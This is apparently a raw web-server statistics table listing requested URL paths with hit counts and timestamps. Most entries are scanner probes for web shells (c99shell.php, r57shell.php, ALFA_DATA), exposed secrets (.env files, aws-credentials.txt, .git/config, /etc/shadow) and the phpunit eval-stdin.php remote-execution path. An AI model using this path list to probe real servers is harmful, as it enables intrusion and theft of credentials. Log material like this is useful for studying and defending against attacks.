0 0 1 0 0 29248560 0 0 29248560 0 /login?pp=enable&pp=env 1 0 0 0 1 0 0 29313859 0 0 29313859 0 /2023 1 0 0 0 1 0 0 29313854 0 0 29313854 0 /2022 1 0 0 0 4 0 0 29388631 0 0 29306748 0 /num.php 1 0 0 0 1 0 0 29313910 0 0 29313910 0 /2021 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-includes/SimplePie/wp-login.php 1 0 0 0 1 0 0 29313873 0 0 29313873 0 /2019 1 0 0 0 1 0 0 29313871 0 0 29313871 0 /2020 1 0 0 0 1 0 0 29313876 0 0 29313876 0 /2018 1 0 0 0 1 0 0 29313865 0 0 29313865 0 /2017 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /home 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /randkeyword.php 1 0 0 0 1 0 0 29187235 0 0 29187235 0 /blog/ALFA_DATA/alfacgiapi/ 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /pent.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/system_log.php? 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /wp-omo.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /note.php 1 0 0 0 4 0 0 29341247 0 0 29277539 0 /orm.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /hly.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /uploader.php 1 0 0 0 2 0 0 29250912 0 0 29250912 0 /akcc.php?del=.well-known&p= 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /dex.php 1 25 25 0 0 28774999 0 0 28703413 0 0 24378 /?198.235.24.138 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /cronlab/.env 1 0 0 0 11 0 0 29388027 0 0 29299891 0 /vee.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /dev/.env 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /fmk.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /yas.php 1 0 0 0 6 0 0 29402814 0 0 29277539 0 /ot.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /bes.php 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /wp/wp-includes/wlwmanifest.xml 1 1 0 0 0 28686122 0 0 28686122 0 0 64 /.well-known/acme-challenge/1LONNQC4OWX7VFDQ-TT_IVKSHZG3COLV 1 0 0 0 3 0 0 29248560 0 0 28620679 0 /sendgrid.env 1 0 0 0 6 0 0 29388632 0 0 29277539 0 /epinyins.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /wan.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.docker/.env 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.prod.local 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /.well-known/index.php 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /wb.php 1 0 0 0 9 0 0 29388027 0 0 29354064 0 /ut.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /core/Datavase/.env 1 0 0 0 8 0 0 29388631 0 0 29291986 0 /file17.php 1 0 0 0 7 0 0 29388632 0 0 29291986 0 /ava.php 1 0 0 0 4 0 0 29388632 0 0 29365498 0 /pass.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.txt 1 0 0 0 4 0 0 29368602 0 0 29326315 0 /about3.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /wp-config.php.backup 1 1 0 0 0 28598314 0 0 28598314 0 0 64 /.well-known/acme-challenge/V1ZDAN-7GARJD8LBKB41-8HLVA_26U5B 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /image.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /sendgrid.json 1 0 0 0 5 0 0 29187256 0 0 28990819 0 /sftp-config.json 1 0 0 0 6 0 0 29402814 0 0 29291986 0 /co.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /xxa.php 1 0 0 0 3 0 0 29388632 0 0 29306748 0 /sad.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/env.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /tor.php 1 0 0 0 4 0 0 29362131 0 0 29277539 0 /fex.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /fresh3.php 1 0 0 0 2 0 0 29365498 0 0 29326315 0 /wp-2019.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /kaza.php 1 0 0 0 1 0 0 29263273 0 0 29263273 0 /wp-json/wp/v2/users?192.42.116.194 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-content/packed.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /aws-credentials.txt 1 0 0 0 1 0 0 29372452 0 0 29372452 0 /tiny.php?109.196.75.89 1 0 0 0 7 0 0 29372859 0 0 29291986 0 /des.php 1 1 1 0 0 29263273 0 0 29263273 0 0 0 /?author=1 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /ertg.php 1 0 0 0 5 0 0 29388027 0 0 29299891 0 /vanta.php 1 0 0 0 1 0 0 29187211 0 0 29187211 0 /files/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29211744 0 0 29211744 0 /.tmb/mariju.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /nx.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/settings.php 1 0 0 0 1 0 0 29210009 0 0 29210009 0 /wp-content/themes/travel/issue.php 1 0 0 1 39 0 28695432 29416373 0 28695432 28598316 0 /.env 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /ioxi.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /c4.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /shared/.env 1 0 0 0 2 0 0 29250912 0 0 29250911 0 /akcc.php?p=cgi-bin&upload= 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /saiga.php 1 0 0 0 6 0 0 29372859 0 0 29354065 0 /mpxct.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /bild.php 1 0 0 0 4 0 0 29388632 0 0 29294468 0 /667.php 1 0 0 0 4 0 0 29415130 0 0 29367838 0 /wp-includes/block-patterns/index.php 1 0 0 0 1 0 0 29231833 0 0 29231833 0 /robots.txt?192.42.116.194 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /1vbqo.php 1 0 0 0 6 0 0 29388631 0 0 29291986 0 /rsnu.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /ioxi-o1.php 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=akcc.php&p=cgi-bin 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /qqq.php 1 1 0 0 0 29037484 0 0 29037484 0 0 64 /.well-known/acme-challenge/ZBZH2Y1KXE7G3Y5UEIV-M7MCPHMHU2-K 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /chn.php 1 0 0 0 12 0 0 29372859 0 0 29277539 0 /v.php 1 0 0 0 4 0 0 29388632 0 0 29211744 0 /dropdown.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /backend/config.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/mailgun.json 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /covert_shell.php 1 2 2 0 0 29250913 0 0 29250911 0 0 1194 /.well-known/acme-challenge/ 1 0 0 0 5 0 0 29415130 0 0 29383751 0 /wp-admin/js/wp-conflg.php?p= 1 0 0 0 1 0 0 29176994 0 0 29176994 0 http://www.ia.imators.com/.env 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/update-core.php 1 0 0 0 3 0 0 29410639 0 0 29211744 0 /wp-admin/install.php 1 0 0 0 1 0 0 29187241 0 0 29187241 0 /components/ALFA_DATA/alfacgiapi/ 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /owl.php 1 0 0 0 6 0 0 29388632 0 0 29306748 0 /ahax.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /bdr.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /bkxzo.php 1 0 0 0 2 0 0 29341248 0 0 29341248 0 /sx21_1.php 1 0 0 0 5 0 0 29359668 0 0 29291986 0 /default.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /tyasd.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-includes/class-wp.php 1 0 0 0 1 0 0 29313812 0 0 29313812 0 /WordPress 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /haa.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /aspshell.asp 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /fesa.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lib/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /va.php 1 0 0 0 4 0 0 29415130 0 0 29294468 0 /class-t.api.php 1 0 0 0 3 0 0 29415130 0 0 29365498 0 /class.php 1 0 0 0 4 0 0 29402814 0 0 29354065 0 /article.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /akcc.php?copy=.well-known&p=.well-known 1 0 0 0 33 0 0 29403002 0 0 28598316 0 /cgi-bin/ 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /aw.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /456.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /includes/includes.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /backup/phpinfo.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /q.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/themes/twentytwentytwo/index.php?p= 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /click.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /hn.php 1 0 0 0 1 0 0 29313962 0 0 29313962 0 /BLOG 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.txt/html/.env 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /class629.php 1 0 0 0 9 0 0 29415130 0 0 29354064 0 /wsd.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /erin1.PhP7 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /png.php 1 0 0 0 10 0 0 29388632 0 0 29325293 0 /12.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /f-401.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/common/menu.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-includes/IXR/about.php 1 0 0 0 2 0 0 29326315 0 0 29299891 0 /aa2.php 1 0 0 0 8 0 0 29415130 0 0 29326315 0 /mail.php 1 0 0 0 4 0 0 29388632 0 0 29294468 0 /jga.php 1 0 0 0 1 0 0 29277840 0 0 29277840 0 /.well-known/acme-challenge/atomlib.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /.production 1 0 0 0 8 0 0 29388632 0 0 29325293 0 /6.php 1 0 0 0 6 0 0 29415130 0 0 29325293 0 /index/function.php 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /wp-includes/xl2023.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 11 0 0 29415130 0 0 29277539 0 /ar.php 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /wp1/wp-includes/wlwmanifest.xml 1 0 0 0 6 0 0 29388027 0 0 29354064 0 /filer.php 1 0 0 0 16 0 0 29410639 0 0 28995765 0 /wp 1 1 1 0 0 29248560 0 0 29248560 0 0 609 /?pp=enable&pp=env 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /site/wp-includes/wlwmanifest.xml 1 0 0 0 3 0 0 29388632 0 0 29372859 0 /7h.php 1 0 0 0 4 0 0 29388632 0 0 29277539 0 /witmm.php 1 0 0 0 3 0 0 29388632 0 0 29278577 0 /l.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /auth/login 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /xl2023x.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /etc/shadow 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /hi.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /n3.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /sjcawlic.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /php8.php 1 0 0 0 8 0 0 29415130 0 0 29367838 0 /wp-admin/wp-conflg.php?p= 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /admi.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /moo.php 1 0 0 0 5 0 0 29402814 0 0 29365498 0 /Okxob.php 1 0 0 0 3 0 0 29325243 0 0 29248560 0 /administrator/.env 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.travis 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /mr.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /0day.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /cmdshell.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.cgi 1 0 0 0 2 0 0 29250912 0 0 29250911 0 /akcc.php?del=.htaccess&p= 1 0 0 0 2 0 0 29250911 0 0 29250911 0 /akcc.php?img=favicon 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /.lajuju.php 1 0 0 0 7 0 0 29388027 0 0 29299891 0 /file7.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /akses.php 1 0 0 0 3 0 0 29388632 0 0 29306748 0 /rak.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /backup/.env 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /themes/twentytwentytwo/index.php 1 12 12 0 0 28700952 0 0 28661173 0 0 11269 /?199.45.154.72 1 0 0 0 18 0 0 29415130 0 0 29325293 0 /1.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /nx9.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /laravel/core/.env 1 1 0 0 0 29301183 0 0 29301183 0 0 87 /.well-known/acme-challenge/U2sg2GhcGjjhxCbnrBbansvurtg_jJBK_SF3wr2sb5M?147.93.158.41 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 10 0 0 29410639 0 0 28995765 0 /test 1 0 0 0 3 0 0 29326315 0 0 29291986 0 /file.php 1 0 0 0 1 0 0 29128604 0 0 29128604 0 /backend/.git/config 1 0 0 0 9 0 0 29415130 0 0 29278577 0 /g.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /r57shell.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-content/themes/wp-pridmag/init.php? 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /fv.php 1 0 0 0 12 0 0 29388027 0 0 29291986 0 /gm.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /cmdexec.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-2019.php? 1 0 0 0 1 0 0 28774705 0 0 28774705 0 /static/admin/javascript/hetong.js 1 0 0 0 1 0 0 29187217 0 0 29187217 0 /css/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29187204 0 0 29187204 0 /wp-content/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /code.php 1 0 0 0 23 0 0 29415130 0 0 29277539 0 /lv.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /webjars/swagger-ui/ 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /obfuscated_shell.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /php_errors.log 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /menu.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /secret_shell.php 1 0 0 0 4 0 0 29415130 0 0 29325294 0 /wp-includes/assets/index.php 1 2 0 0 0 28907956 0 0 28873380 0 0 4642 /_autoindex/assets/js/tablesort.js?45.148.10.172 1 2 0 0 0 28879070 0 0 28784071 0 0 684 /_autoindex/assets/js/tablesort.number.js?45.148.10.172 1 0 0 0 9 0 0 29372859 0 0 29294468 0 /a2.php 1 0 0 0 15 0 0 29388632 0 0 29291986 0 /file2.php 1 117 0 0 0 29362906 0 0 28598316 0 0 41874 /_autoindex/assets/js/tablesort.number.js 1 0 0 0 4 0 0 29365498 0 0 29354065 0 /ini.php 1 0 0 0 29 0 0 29184928 0 0 28698505 0 /ads.txt 1 0 0 0 11 0 0 29416373 0 0 28974060 0 /test.php 1 0 0 0 1 0 0 29313956 0 0 29313956 0 /SITE 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /command_shell.php 1 2 0 0 0 29319621 0 0 29296471 0 0 4458 /_autoindex/assets/js/tablesort.js?147.93.158.41 1 1 0 0 0 29294856 0 0 29294856 0 0 322 /_autoindex/assets/js/tablesort.number.js?147.93.158.41 1 0 0 0 2 0 0 29278576 0 0 29278576 0 /shell.asp 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/rest-api/fields/index.php? 1 0 0 0 1 0 0 29210011 0 0 29210011 0 /wp-admin/images/users.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp-gif.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /modules/modules.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /rex.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /xv.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /Ova-Simple.php 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /server-status 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /b.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /ez.php 1 0 0 0 1 0 0 29187247 0 0 29187247 0 /uploads/ALFA_DATA/alfacgiapi/ 1 0 0 0 2 0 0 29278576 0 0 29211745 0 /wp-content/uploads/index.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /tool/view/phpinfo.view.php 1 0 0 0 3 0 0 29327095 0 0 29294468 0 /zeal.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /class5.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /common/.git/config 1 0 0 0 19 0 0 29393907 0 0 28968133 0 /news/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=.well-known&finish=1&move=1&p= 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /ww1.php 1 0 0 0 3 0 0 29329147 0 0 29277539 0 /ova.php 1 0 0 0 2 0 0 29274239 0 0 29270173 0 /blog/ 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /akp.php 1 1 0 0 0 29389149 0 0 29389149 0 0 64 /.well-known/acme-challenge/0WG6VK7WZGV2OO588QB39N3C633K2LU5 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /images/iR7SzrsOUEP.php 1 0 0 0 7 0 0 29127160 0 0 28995766 0 /temp 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /aspxshell.aspx 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.envrc 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/update.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /sh.php 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /telescope/requests 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp-is.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /mar.php 1 0 0 0 6 0 0 29388027 0 0 29354064 0 /f6.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /ac.php 1 0 0 0 7 0 0 29372859 0 0 29325293 0 /NewFile.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /live_env 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /tiny.php?p= 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lib/phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-includes/ID3/about.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /configs/application.ini 1 0 0 0 1 0 0 29210009 0 0 29210009 0 /wp-content/plugins/wp-help/index.php 1 0 0 0 2 0 0 29250913 0 0 29250911 0 /akcc.php?p=.well-known 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /bb5.php 1 0 0 0 1 0 0 29313830 0 0 29313830 0 /Old 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29351087 0 0 29351087 0 /phpinfo.php?147.93.158.41 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env~ 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /access.log 1 0 0 0 1 0 0 29365390 0 0 29365390 0 /phpinfo.php?109.196.75.89 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /himu.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /core/app/.env 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /debug/default/view?panel=config 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /akk.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /v1/.git/config 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.envs 1 0 0 0 14 0 0 29416373 0 0 28605909 0 /phpinfo.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /network.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /w1w.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /o1i2ien.php 1 0 0 0 7 0 0 29127160 0 0 28995765 0 /ia 1 1 0 0 0 28979553 0 0 28979553 0 0 2321 /_autoindex/assets/js/tablesort.js?104.166.80.124 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /laravel/.env 1 0 0 0 1 0 0 28777719 0 0 28777719 0 /.env.exemple 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /feed 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /shop/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp-asd.php 1 0 0 0 3 0 0 29388632 0 0 29210038 0 /xl.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /1aa.php 1 1 0 0 0 28892043 0 0 28892043 0 0 362 /_autoindex/assets/js/tablesort.number.js?104.166.80.124 1 1 0 0 0 28686122 0 0 28686122 0 0 64 /.well-known/acme-challenge/ZHYIY9O4378VOSM6BL-ZAPJT21LDUOXH?199.45.154.72 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /as/function.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wp-content/themes/pridmag/db.php?u 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.aws/config 1 0 0 0 5 0 0 29359668 0 0 29325293 0 /wp-22.php 1 0 0 0 2 0 0 29384960 0 0 29291986 0 /wio.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /templates/templates.php 1 0 0 0 2 0 0 29416373 0 0 29388817 0 /config/database.yml 1 0 0 0 19 0 0 29393907 0 0 28968133 0 /wp2/wp-includes/wlwmanifest.xml 1 0 0 0 7 0 0 29388632 0 0 29306748 0 /bless2.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /btk.php 1 0 0 0 2 0 0 29129499 0 0 28604394 0 /public/.git/config 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /AnonymousFox.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /moon.php?p= 1 0 0 0 3 0 0 29327095 0 0 29277539 0 /xex.php 1 0 0 0 4 0 0 29415130 0 0 29325293 0 /admin.php?p= 1 0 0 0 7 0 0 29362131 0 0 29277539 0 /tgrs.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lab/.env 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /client/.env 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /_vti_pvt/service.pwd 1 0 0 0 1 0 0 29210008 0 0 29210008 0 /wp-content/mah.php 1 0 0 0 7 0 0 29011986 0 0 28794936 0 /favicon.ico?104.166.80.124 1 0 0 0 1 0 0 29313807 0 0 29313807 0 /WORDPRESS 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /api/graphql 1 0 0 0 12 0 0 29384959 0 0 29210008 0 /mah.php 1 0 0 0 6 0 0 29389153 0 0 28949646 0 /actuator/env 1 0 0 0 3 0 0 29269510 0 0 29215382 0 /wp-admin/setup-config.php?step=1&language=en_EN 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /backup.tar.gz 1 0 0 0 1 0 0 29313929 0 0 29313929 0 /SHOP 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /.local 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /ftp.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /css/colors/blue/index.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /rei.php 1 0 0 0 10 0 0 29388632 0 0 29277539 0 /wp.php 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /.well-known/acme-challenge/iR7SzrsOUEP.php 1 0 0 0 2 0 0 29235620 0 0 29215699 0 /.env?192.42.116.194 1 0 0 0 2 0 0 29416373 0 0 29388817 0 /logs/error.log 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /fb.php 1 5 0 0 0 28861803 0 0 28861803 0 0 435 /.well-known/acme-challenge/JO0p770rTZ4SV8wumC6h0hQJFZk_n9TJshMO9eGHsjU 1 0 0 0 1 0 0 29313918 0 0 29313918 0 /bk 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /zex.php 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /gorila.php 1 1 0 0 0 28949643 0 0 28949643 0 0 64 /.well-known/acme-challenge/J33_AFXV0UE64OQ_W47MRQW2NH8JAUKF?45.148.10.172 1 0 0 0 3 0 0 29269510 0 0 29215382 0 /wordpress/wp-admin/setup-config.php?step=1&language=en_EN 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /keu.php 1 0 0 0 4 0 0 29384960 0 0 29294468 0 /yanki.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /finny.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /kwm4.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /dev/phpinfo.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env1 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=.well-known&p=cgi-bin 1 0 0 0 18 0 0 29389153 0 0 28598316 0 /.vscode/sftp.json 1 0 0 0 1 0 0 29313896 0 0 29313896 0 /bc 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /kk.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /f2r4.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /c99shell.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/file.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /graphql 1 0 0 0 4 0 0 29388632 0 0 29358831 0 /wsr2.php 1 0 0 0 5 0 0 29388632 0 0 29294468 0 /aaaa.php 1 0 0 2 5 0 29250910 29384959 0 29250910 29326315 0 /akcc.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /waw.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /ddgg.php 1 0 0 0 3 0 0 29388632 0 0 29341248 0 /bluejackets.php 1 0 0 0 2 0 0 29250912 0 0 29250911 0 /akcc.php?p=&view=akcc.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /termps.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /v3/api-docs 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wteed.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /security.php 1 0 0 0 1 0 0 29187231 0 0 29187231 0 /wp-content/alfacgiapi/ 1 0 0 0 1 0 0 29382618 0 0 29382618 0 /wp-admin/setup-config.php?109.196.75.89 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /lol.php 1 0 0 0 3 0 0 29388631 0 0 29384960 0 /Sanskrit.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /ef.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29126459 0 0 29126459 0 /wp-content/?192.42.116.194 1 0 0 0 1 0 0 29228723 0 0 29228723 0 /moddofuns.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /database.sql 1 0 0 0 24 0 0 29393906 0 0 28867962 0 /web/wp-includes/wlwmanifest.xml 1 0 0 0 4 0 0 29384959 0 0 29354064 0 /miso.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-includes/style-engine/index.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /cgi-bin/wp-login.php 1 0 0 0 1 0 0 29313845 0 0 29313845 0 /New 1 0 0 0 3 0 0 29267936 0 0 29226377 0 /wp-admin/install.php?step=1 1 0 0 0 2 0 0 29368602 0 0 29367838 0 /wlex.php 1 0 0 0 4 0 0 29362131 0 0 29277539 0 /fm.php?p= 1 0 0 0 7 0 0 29415130 0 0 29211744 0 /wp-admin/about.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /bge.php 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /sh3ll.php 1 0 0 0 6 0 0 29372859 0 0 29354064 0 /33.php 1 0 0 0 1 